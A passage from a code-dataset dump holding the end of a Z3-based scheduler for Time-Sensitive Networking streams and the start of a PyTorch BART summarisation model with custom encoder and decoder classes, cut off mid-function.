utils.load_network(net_path)\n self.task.set_routings(\n {s: self.net.get_shortest_path(s.src, s.dst) for s in self.task.streams}\n )\n\n z3.set_param(\"parallel.enable\", True)\n z3.set_param(\"parallel.threads.max\", self.workers)\n self.solver = z3.Solver()\n self.task_vars = self.create_task_vars(self.task)\n\n def prepare(self) -> None:\n self.add_frame_const(self.solver, self.task_vars)\n self.add_flow_trans_const(self.solver, self.task_vars)\n self.add_delay_const(self.solver, self.task_vars)\n self.add_link_const(self.solver, self.task_vars, self.net, self.task)\n self.add_queue_range_const(self.solver, self.task_vars)\n self.add_frame_isolation_const(self.solver, self.task_vars, self.task)\n\n @utils.check_time_limit\n def solve(self) -> utils.Statistics:\n self.solver.set(\"timeout\", int(utils.T_LIMIT - utils.time_log()) * 1000)\n result = self.solver.check() ## Z3 solving\n\n info = self.solver.statistics()\n algo_time = info.time\n algo_mem = info.max_memory\n algo_result = (\n utils.Result.schedulable if result == z3.sat else utils.Result.unschedulable\n )\n\n self.model_output = self.solver.model()\n return utils.Statistics(\"-\", algo_result, algo_time, algo_mem)\n\n def output(self) -> utils.Config:\n config = utils.Config()\n config.gcl = self.get_gcl_list(self.model_output, self.task_vars, self.task.lcm)\n config.release = self.get_release_time(self.model_output, self.task_vars)\n config.queue = self.get_queue_assignment(self.model_output, self.task_vars)\n config.route = self.get_route(self.task_vars)\n config._delay = self.get_delay(self.model_output, self.task_vars)\n return config\n\n @staticmethod\n def create_task_vars(tasks: utils.StreamSet) -> VarDict:\n task_var: VarDict = {}\n for s in tasks:\n task_var.setdefault(s, {})\n for l in s.routing_path.links:\n task_var[s].setdefault(l, {})\n task_var[s][l][\"phi\"] = z3.Int(\"phi_\" + str(s) + \"_\" + str(l))\n task_var[s][l][\"p\"] = z3.Int(\"p_\" + str(s) + \"_\" + str(l))\n return task_var\n\n @staticmethod\n def add_frame_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n solver.add(\n var[s][l][\"phi\"] >= 0, var[s][l][\"phi\"] <= s.period - s.t_trans\n )\n\n @staticmethod\n def add_flow_trans_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n next_hop = s.routing_path.get_next_link(l)\n if next_hop is None:\n continue\n solver.add(\n var[s][l][\"phi\"] + s.t_trans + next_hop.t_proc + next_hop.t_sync\n <= var[s][next_hop][\"phi\"]\n )\n\n @staticmethod\n def add_delay_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n solver.add(\n var[s][s.first_link][\"phi\"] + s.deadline\n >= var[s][s.last_link][\"phi\"] + s.t_trans + s.last_link.t_sync\n )\n\n @staticmethod\n def add_link_const(\n solver: z3.Solver, var: VarDict, net: utils.Network, task: utils.StreamSet\n ) -> None:\n for l in net.links:\n for s1, s2 in task.get_pairs_on_link(l):\n for f1, f2 in task.get_frame_index_pairs(s1, s2):\n solver.add(\n z3.Or(\n var[s1][l][\"phi\"] + f1 * s1.period\n >= var[s2][l][\"phi\"] + f2 * s2.period + s2.t_trans,\n var[s2][l][\"phi\"] + f2 * s2.period\n >= var[s1][l][\"phi\"] + f1 * s1.period + s1.t_trans,\n )\n )\n\n @staticmethod\n def add_queue_range_const(solver: z3.Solver, var: VarDict) -> None:\n for s in var.keys():\n for l in var[s].keys():\n solver.add(0 <= var[s][l][\"p\"])\n solver.add(var[s][l][\"p\"] < l.q_num)\n\n @staticmethod\n def add_frame_isolation_const(\n solver: z3.Solver, var: VarDict, task: utils.StreamSet\n ) -> None:\n for s1, s2 in task.get_pairs():\n for pl_1, pl_2, l in task.get_merged_links(s1, s2):\n for f1, f2 in task.get_frame_index_pairs(s1, s2):\n solver.add(\n z3.Or(\n var[s2][l][\"phi\"] + f2 * s2.period + l.t_sync\n <= var[s1][pl_1][\"phi\"] + f1 * s1.period + pl_1.t_proc,\n var[s1][l][\"phi\"] + f1 * s1.period + l.t_sync\n <= var[s2][pl_2][\"phi\"] + f2 * s2.period + pl_2.t_proc,\n var[s1][l][\"p\"] != var[s2][l][\"p\"],\n )\n )\n\n @staticmethod\n def get_gcl_list(result, var: VarDict, lcm: int) -> utils.GCL:\n gcl = []\n for s in var.keys():\n for l in var[s].keys():\n queue = result[var[s][l][\"p\"]].as_long()\n release = result[var[s][l][\"phi\"]].as_long()\n for k in s.get_frame_indexes(lcm):\n gcl.append(\n [\n l,\n queue,\n release + k * s.period,\n release + k * s.period + s.t_trans,\n lcm,\n ]\n )\n return utils.GCL(gcl)\n\n @staticmethod\n def get_release_time(result, var: VarDict) -> utils.Release:\n release = []\n for s in var.keys():\n release.append([s, 0, result[var[s][s.first_link][\"phi\"]].as_long()])\n return utils.Release(release)\n\n @staticmethod\n def get_queue_assignment(result, var) -> utils.Queue:\n queue = []\n for s in var.keys():\n for l in var[s].keys():\n queue.append([s, 0, l, result[var[s][l][\"p\"]].as_long()])\n return utils.Queue(queue)\n\n @staticmethod\n def get_route(var) -> utils.Route:\n route = []\n for s in var.keys():\n for l in var[s].keys():\n route.append([s, l])\n return utils.Route(route)\n\n @staticmethod\n def get_delay(result, var) -> utils.Delay:\n delay = []\n for s in var.keys():\n _delay = (\n result[var[s][s.last_link][\"phi\"]].as_long()\n - result[var[s][s.first_link][\"phi\"]].as_long()\n + s.t_trans\n )\n delay.append([s, 0, _delay])\n return utils.Delay(delay)\n\n\nif __name__ == \"__main__\":\n args = utils.parse_command_line_args()\n benchmark(args.name, args.task, args.net, args.output, args.workers)\n", "repo_name": "ChuanyuXue/tsnkit", "sub_path": "src/tsnkit/models/smt_wa.py", "file_name": "smt_wa.py", "file_ext": "py", "file_size_in_byte": 8187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "z3.ArithRef", "line_number": 12, "usage_type": "attribute"}, {"api_name": "z3.set_param", "line_number": 50, "usage_type": "call"}, {"api_name": "z3.set_param", "line_number": 51, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 52, "usage_type": "call"}, {"api_name": "z3.sat", "line_number": 72, "usage_type": "attribute"}, {"api_name": "z3.Int", "line_number": 94, "usage_type": "call"}, {"api_name": "z3.Int", "line_number": 95, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 99, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 107, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 119, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 128, "usage_type": "attribute"}, {"api_name": "z3.Or", "line_number": 134, "usage_type": "call"}, {"api_name": "z3.Solver", "line_number": 143, "usage_type": "attribute"}, {"api_name": "z3.Solver", "line_number": 151, "usage_type": "attribute"}, {"api_name": "z3.Or", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "44282383471", "text": "from typing import Any, Dict, Tuple, Union, Optional\nimport torch\nimport torch.nn as nn\nimport random\nimport math\nimport wandb\nfrom model_utils import saveCallBack, DualBaseModelOutput\nfrom transformers import (\n BartPretrainedModel,\n AutoTokenizer,\n AutoConfig,\n BartForConditionalGeneration,\n)\nfrom torch.nn import CrossEntropyLoss\nfrom transformers.models.bart.modeling_bart import (\n shift_tokens_right,\n BartConfig,\n BartEncoderLayer,\n BartPretrainedModel,\n _expand_mask,\n _make_causal_mask,\n BartLearnedPositionalEmbedding,\n BartDecoderLayer,\n)\nfrom transformers.modeling_outputs import (\n Seq2SeqLMOutput,\n BaseModelOutput,\n Seq2SeqModelOutput,\n BaseModelOutputWithPastAndCrossAttentions,\n)\nimport nltk\nfrom global_utils import get_rouge_score\nimport numpy as np\nfrom pytorch_lightning import LightningModule\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport time\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\n\nclass BartDecoder(BartPretrainedModel):\n \"\"\"\n Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a :class:`BartDecoderLayer`\n\n Args:\n config: BartConfig\n embed_tokens (nn.Embedding): output embedding\n \"\"\"\n\n def __init__(self, config: BartConfig, embed_tokens: Optional[nn.Embedding] = None):\n super().__init__(config)\n self.dropout = config.dropout\n self.layerdrop = config.decoder_layerdrop\n self.padding_idx = config.pad_token_id\n self.max_target_positions = config.max_position_embeddings\n self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0\n\n if embed_tokens is not None:\n self.embed_tokens = embed_tokens\n else:\n self.embed_tokens = nn.Embedding(\n config.vocab_size, config.d_model, self.padding_idx\n )\n\n self.embed_positions = BartLearnedPositionalEmbedding(\n config.max_position_embeddings,\n config.d_model,\n )\n self.layers = nn.ModuleList(\n [BartDecoderLayer(config) for _ in range(config.decoder_layers)]\n )\n self.layernorm_embedding = nn.LayerNorm(config.d_model)\n\n self.init_weights()\n\n def get_input_embeddings(self):\n return self.embed_tokens\n\n def set_input_embeddings(self, value):\n self.embed_tokens = value\n\n def _prepare_decoder_attention_mask(\n self, attention_mask, input_shape, inputs_embeds, past_key_values_length\n ):\n # create causal mask\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n combined_attention_mask = None\n if input_shape[-1] > 1:\n combined_attention_mask = _make_causal_mask(\n input_shape,\n inputs_embeds.dtype,\n past_key_values_length=past_key_values_length,\n ).to(self.device)\n\n if attention_mask is not None:\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n expanded_attn_mask = _expand_mask(\n attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]\n )\n combined_attention_mask = (\n expanded_attn_mask\n if combined_attention_mask is None\n else expanded_attn_mask + combined_attention_mask\n )\n\n return combined_attention_mask\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n encoder_hidden_states=None,\n encoder_attention_mask=None,\n head_mask=None,\n cross_attn_head_mask=None,\n past_key_values=None,\n inputs_embeds=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **kwargs, # 主要的修改\n ):\n r\"\"\"\n Args:\n input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):\n Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you\n provide it.\n\n Indices can be obtained using :class:`~transformers.BartTokenizer`. See\n :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`\n for details.\n\n `What are input IDs? <../glossary.html#input-ids>`__\n attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:\n\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n\n `What are attention masks? <../glossary.html#attention-mask>`__\n encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):\n Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention\n of the decoder.\n encoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, encoder_sequence_length)`, `optional`):\n Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values\n selected in ``[0, 1]``:\n\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n\n `What are attention masks? <../glossary.html#attention-mask>`__\n head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing\n cross-attention on hidden heads. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):\n Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2\n tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional\n tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.\n\n Contains pre-computed hidden-states (key and values in the self-attention blocks and in the\n cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential\n decoding.\n\n If :obj:`past_key_values` are used, the user can optionally input only the last\n :obj:`decoder_input_ids` (those that don't have their past key value states given to this model) of\n shape :obj:`(batch_size, 1)` instead of all :obj:`decoder_input_ids`` of shape :obj:`(batch_size,\n sequence_length)`.\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded\n representation. This is useful if you want more control over how to convert :obj:`input_ids` indices\n into associated vectors than the model's internal embedding lookup matrix.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`):\n Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors\n for more detail.\n return_dict (:obj:`bool`, `optional`):\n Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.\n \"\"\"\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # retrieve input_ids and inputs_embeds\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n input_ids = input_ids.view(-1, input_shape[-1])\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\n \"You have to specify either decoder_input_ids or decoder_inputs_embeds\"\n )\n\n # past_key_values_length\n past_key_values_length = (\n past_key_values[0][0].shape[2] if past_key_values is not None else 0\n )\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale\n\n attention_mask = self._prepare_decoder_attention_mask(\n attention_mask, input_shape, inputs_embeds, past_key_values_length\n )\n\n # expand encoder attention mask\n if encoder_hidden_states is not None and encoder_attention_mask is not None:\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n encoder_attention_mask = _expand_mask(\n encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]\n )\n\n # embed positions\n positions = self.embed_positions(input_shape, past_key_values_length)\n\n hidden_states = inputs_embeds + positions\n hidden_states = self.layernorm_embedding(hidden_states)\n\n hidden_states = nn.functional.dropout(\n hidden_states, p=self.dropout, training=self.training\n )\n\n # decoder layers\n all_hidden_states = () if output_hidden_states else None\n all_self_attns = () if output_attentions else None\n all_cross_attentions = (\n () if (output_attentions and encoder_hidden_states is not None) else None\n )\n next_decoder_cache = () if use_cache else None\n\n # check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired\n for attn_mask, mask_name in zip(\n [head_mask, cross_attn_head_mask], [\"head_mask\", \"cross_attn_head_mask\"]\n ):\n if attn_mask is not None:\n assert attn_mask.size()[0] == (\n len(self.layers)\n ), f\"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}.\"\n for idx, decoder_layer in enumerate(self.layers):\n # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n dropout_probability = random.uniform(0, 1)\n if self.training and (dropout_probability < self.layerdrop):\n continue\n\n past_key_value = (\n past_key_values[idx] if past_key_values is not None else None\n )\n\n if getattr(self.config, \"gradient_checkpointing\", False) and self.training:\n if use_cache:\n logger.warning(\n \"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting \"\n \"`use_cache=False`...\"\n )\n use_cache = False\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for past_key_value\n return module(*inputs, output_attentions, use_cache)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(decoder_layer),\n hidden_states,\n attention_mask,\n encoder_hidden_states,\n encoder_attention_mask,\n head_mask[idx] if head_mask is not None else None,\n cross_attn_head_mask[idx]\n if cross_attn_head_mask is not None\n else None,\n None,\n )\n else:\n layer_outputs = decoder_layer(\n hidden_states,\n attention_mask=attention_mask,\n encoder_hidden_states=encoder_hidden_states,\n encoder_attention_mask=encoder_attention_mask,\n layer_head_mask=(head_mask[idx] if head_mask is not None else None),\n cross_attn_layer_head_mask=(\n cross_attn_head_mask[idx]\n if cross_attn_head_mask is not None\n else None\n ),\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n hidden_states = layer_outputs[0]\n\n if use_cache:\n next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)\n\n if output_attentions:\n all_self_attns += (layer_outputs[1],)\n\n if encoder_hidden_states is not None:\n all_cross_attentions += (layer_outputs[2],)\n\n # add hidden states from the last decoder layer\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n next_cache = next_decoder_cache if use_cache else None\n if not return_dict:\n return tuple(\n v\n for v in [\n hidden_states,\n next_cache,\n all_hidden_states,\n all_self_attns,\n all_cross_attentions,\n ]\n if v is not None\n )\n return BaseModelOutputWithPastAndCrossAttentions(\n last_hidden_state=hidden_states,\n past_key_values=next_cache,\n hidden_states=all_hidden_states,\n attentions=all_self_attns,\n cross_attentions=all_cross_attentions,\n )\n\n\nclass BartEncoder(BartPretrainedModel):\n \"\"\"\n Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a\n :class:`BartEncoderLayer`.\n\n Args:\n config: BartConfig\n embed_tokens (nn.Embedding): output embedding\n \"\"\"\n\n def __init__(self, config: BartConfig, embed_tokens: Optional[nn.Embedding] = None):\n super().__init__(config)\n\n self.dropout = config.dropout\n self.layerdrop = config.encoder_layerdrop\n\n embed_dim = config.d_model\n self.padding_idx = config.pad_token_id\n self.max_source_positions = config.max_position_embeddings\n self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0\n\n if embed_tokens is not None:\n self.embed_tokens = embed_tokens\n else:\n self.embed_tokens = nn.Embedding(\n config.vocab_size, embed_dim, self.padding_idx\n )\n\n self.embed_positions = BartLearnedPositionalEmbedding(\n config.max_position_embeddings,\n embed_dim,\n )\n self.layers = nn.ModuleList(\n [BartEncoderLayer(config) for _ in range(config.encoder_layers)]\n )\n self.layernorm_embedding = nn.LayerNorm(embed_dim)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n head_mask=None,\n inputs_embeds=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **kwargs,\n ):\n r\"\"\"\n Args:\n input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):\n Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you\n provide it.\n\n Indices can be obtained using :class:`~transformers.BartTokenizer`. See\n :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`\n for details.\n\n `What are input IDs? <../glossary.html#input-ids>`__\n attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:\n\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n\n `What are attention masks? <../glossary.html#attention-mask>`__\n head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded\n representation. This is useful if you want more control over how to convert :obj:`input_ids` indices\n into associated vectors than the model's internal embedding lookup matrix.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`):\n Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors\n for more detail.\n return_dict (:obj:`bool`, `optional`):\n Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.\n \"\"\"\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # retrieve input_ids and inputs_embeds\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both input_ids and inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n input_ids = input_ids.view(-1, input_shape[-1])\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale\n\n embed_pos = self.embed_positions(input_shape)\n\n hidden_states = inputs_embeds + embed_pos\n hidden_states = self.layernorm_embedding(hidden_states)\n hidden_states = nn.functional.dropout(\n hidden_states, p=self.dropout, training=self.training\n )\n\n # expand attention_mask\n if attention_mask is not None:\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)\n\n encoder_states = () if output_hidden_states else None\n all_attentions = () if output_attentions else None\n\n # check if head_mask has a correct number of layers specified if desired\n if head_mask is not None:\n assert head_mask.size()[0] == (\n len(self.layers)\n ), f\"The head_mask should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}.\"\n for idx, encoder_layer in enumerate(self.layers):\n if output_hidden_states:\n encoder_states = encoder_states + (hidden_states,)\n # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)\n dropout_probability = random.uniform(0, 1)\n if self.training and (\n dropout_probability < self.layerdrop\n ): # skip the layer\n layer_outputs = (None, None)\n else:\n if (\n getattr(self.config, \"gradient_checkpointing\", False)\n and self.training\n ):\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n return module(*inputs, output_attentions)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(encoder_layer),\n hidden_states,\n attention_mask,\n (head_mask[idx] if head_mask is not None else None),\n )\n else:\n layer_outputs = encoder_layer(\n hidden_states,\n attention_mask,\n layer_head_mask=(\n head_mask[idx] if head_mask is not None else None\n ),\n output_attentions=output_attentions,\n )\n\n hidden_states = layer_outputs[0]\n\n if output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n if output_hidden_states:\n encoder_states = encoder_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, encoder_states, all_attentions]\n if v is not None\n )\n return BaseModelOutput(\n last_hidden_state=hidden_states,\n hidden_states=encoder_states,\n attentions=all_attentions,\n )\n\n\n# 原论文中重写了BartDecoder,bartEncoder,因为如果需要统一起来,gtbart的时候使用了\n# kwargs,所以需要重写\nclass baseBart(BartPretrainedModel):\n def __init__(self, config: BartConfig, cfg):\n super(baseBart, self).__init__(config)\n padding_idx, vocab_size = config.pad_token_id, config.vocab_size\n self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)\n\n if cfg.model.model_type == \"baseline\":\n self.encoder = BartEncoder(config, self.shared)\n self.decoder = BartDecoder(config, self.shared)\n elif cfg.model.model_type == \"gtbart\":\n pass\n # self.encoder = HierarchicalEncoder(config, self.shared)\n # self.decoder = BartDecoderWithDualCrossAttention(config, self.shared)\n else:\n print(\"请指定模型类型\")\n self.init_weights()\n\n def get_input_embeddings(self):\n return self.shared\n\n def set_input_embeddings(self, value):\n self.shared = value\n self.encoder.embed_tokens = self.shared\n self.decoder.embed_tokens = self.shared\n\n def get_encoder(self):\n return self.encoder\n\n def get_decoder(self):\n return self.decoder\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n head_mask=None,\n decoder_head_mask=None,\n cross_attn_head_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n inputs_embeds=None,\n decoder_inputs_embeds=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ## additional\n **kwargs,\n ):\n # different to other models, Bart automatically creates decoder_input_ids from\n # input_ids if no decoder_input_ids are provided\n if decoder_input_ids is None and decoder_inputs_embeds is None:\n decoder_input_ids = shift_tokens_right(\n input_ids, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n if encoder_outputs is None:\n encoder_outputs = self.encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n\n kwargs.update(encoder_outputs)\n\n if isinstance(encoder_outputs, BaseModelOutput): # baseline case\n encoder_hidden_states = encoder_outputs.last_hidden_state\n encoder_attention_mask = attention_mask\n elif isinstance(encoder_outputs, DualBaseModelOutput): # gtbart case\n encoder_hidden_states = (None,)\n encoder_attention_mask = None\n # decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)\n decoder_outputs = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n encoder_hidden_states=encoder_hidden_states,\n encoder_attention_mask=encoder_attention_mask,\n head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n past_key_values=past_key_values,\n inputs_embeds=decoder_inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n\n if not return_dict:\n return decoder_outputs + encoder_outputs\n\n return Seq2SeqModelOutput(\n last_hidden_state=decoder_outputs.last_hidden_state,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n # encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n # encoder_hidden_states=encoder_outputs.hidden_states,\n # encoder_attentions=speaker_attentions,\n )\n\n\nclass TagBart(BartPretrainedModel):\n base_model_prefix = \"model\"\n _keys_to_ignore_on_load_missing = [r\"final_logits_bias\", r\"lm_head\\.weight\"]\n\n def __init__(self, config: BartConfig, cfg):\n super().__init__(config)\n self.model = baseBart(config, cfg=cfg)\n self.register_buffer(\n \"final_logits_bias\", torch.zeros((1, self.model.shared.num_embeddings))\n )\n self.lm_head = nn.Linear(\n config.d_model, self.model.shared.num_embeddings, bias=False\n )\n\n self.init_weights()\n\n def get_encoder(self):\n return self.model.get_encoder()\n\n def get_decoder(self):\n return self.model.get_decoder()\n\n def resize_token_embeddings(self, new_num_tokens: int) -> nn.Embedding:\n new_embeddings = super().resize_token_embeddings(new_num_tokens)\n self._resize_final_logits_bias(new_num_tokens)\n return new_embeddings\n\n def _resize_final_logits_bias(self, new_num_tokens: int) -> None:\n old_num_tokens = self.final_logits_bias.shape[-1]\n if new_num_tokens <= old_num_tokens:\n new_bias = self.final_logits_bias[:, :new_num_tokens]\n else:\n extra_bias = torch.zeros(\n (1, new_num_tokens - old_num_tokens),\n device=self.final_logits_bias.device,\n )\n new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)\n self.register_buffer(\"final_logits_bias\", new_bias)\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def set_output_embeddings(self, new_embeddings):\n self.lm_head = new_embeddings\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n head_mask=None,\n decoder_head_mask=None,\n cross_attn_head_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n inputs_embeds=None,\n decoder_inputs_embeds=None,\n labels=None,\n use_cache=None,\n output_attentions=True,\n output_hidden_states=None,\n return_dict=None,\n # additional\n **kwargs,\n ):\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n # 然后再beam search 中调用模型的forward\n if labels is not None:\n if decoder_input_ids is None:\n decoder_input_ids = shift_tokens_right(\n labels, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n outputs = self.model(\n input_ids,\n attention_mask=attention_mask,\n decoder_input_ids=decoder_input_ids,\n encoder_outputs=encoder_outputs,\n decoder_attention_mask=decoder_attention_mask,\n head_mask=head_mask,\n decoder_head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n decoder_inputs_embeds=decoder_inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias\n\n masked_lm_loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n masked_lm_loss = loss_fct(\n 